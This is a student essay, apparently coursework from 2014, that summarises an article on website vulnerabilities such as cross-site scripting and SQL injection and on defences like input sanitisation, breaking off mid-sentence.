Website Security Article Evaluation
Anthony Hines Jr.
CMGT/441
July 27, 2014
Vance Collins
Introduction Website security is incredibly important in today’s world. Users around the globe are connected to the Internet and surfing through websites 24 hours a day, seven days a week, all year long. Most individuals will hopefully have some basic knowledge in terms of protecting themselves, through their devices, to prevent web-based attacks or intrusions by those attempting to control another’s device for other means or to steal personal information to access institutions they may use, such as banks and places of employment. Article Overview
The article used for this Website Security Evaluation is one that asks the question: are general, non-technically inclined, users the reason websites are such a prime target for attacks? The article first starts off by giving a technical explanation of what happens when a user clicks “ok” after entering a particular website address. It then goes on to show the main types of web-based attacks and gives a few options on how to combat them and to better protect websites.
Main types of vulnerabilities and ways to improve security
According to the article, there are four main vulnerabilities of website security. They are path traversal, cross-site scripting, cross-site request forgery and SQL injection (Heilmann, 2010). This evaluation will list what the top two attacks do and ways to combat them.
Cross-site scripting (XSS) - This is when a website owner allows its visitors to change the way the website displays. As an example, the article uses changing colors. By allowing visitors to change and enter values into the actual code, they can add almost anything they want. Once that visitor has injected JavaScript with any additional commands they can read out cookies; open forms that ask the user to enter their passwords or credit card details; execute viruses, worms (Heilmann, 2010). Ways to combat this issue are to never insert untrusted data except in allowed locations, make sure your PHP is set correctly, and be vigilant of what comes in by URI. The last two ways (PHP and inputs by URI) are important because the variables you want to prevent are ones that become global variables (Heilmann, 2010). That means that seven billion potential attackers can attempt to add variables and extra coding to carry out malicious deeds. SQL Injection- This is when malicious a SQL statement is deliberately entered into the entry fields for execution. For example, a command is executed to dump the database contents to the attacker. Per the article the best way to combat this type of attack is to sanitize what the user inputs into any fields on the website (Heilmann, 2010). By sanitizing the users input, it is effectively saying the input that is entered is clean of any misdirection of information (Weiss, 2012). It is useful because it means there are no hidden commands